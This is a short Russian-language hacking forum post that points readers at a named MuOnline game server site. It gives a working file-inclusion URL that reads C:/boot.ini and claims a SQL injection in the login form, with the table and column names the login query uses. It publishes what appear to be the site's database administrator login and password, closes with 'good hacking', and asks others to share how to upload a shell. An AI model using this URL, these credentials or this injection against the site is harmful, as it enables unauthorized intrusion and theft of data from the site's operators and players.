Всем привет!
Тут вот есть один глючный сайт... Покажу сразу пример
http://mu.hopto.org/index.php?show=C:/boot.ini (что м этим можно делать, сами знаете!)
Также сайт связвн с MSSQL (Тама где авторизация, есть SQL Injection)
Это так... Скучное описание... Всёравно порты закрыты
DB: MuOnline
Login: sa
Pass: EUJD3drM

Насчёт MSSQL при авторизации скрипт обращается в таблицу MEMB_INFO а именно в колонку memb__pwd и memb___id (Сначало пароль, потом логин!)
В общем!
SELECT * FROM MEMB_INFO WHERE memb__pwd = " and memb___id ''
Удачного взлома
Очень интересно как туды шелл закинуть... У кого получится, напишите как, всётаки интересно...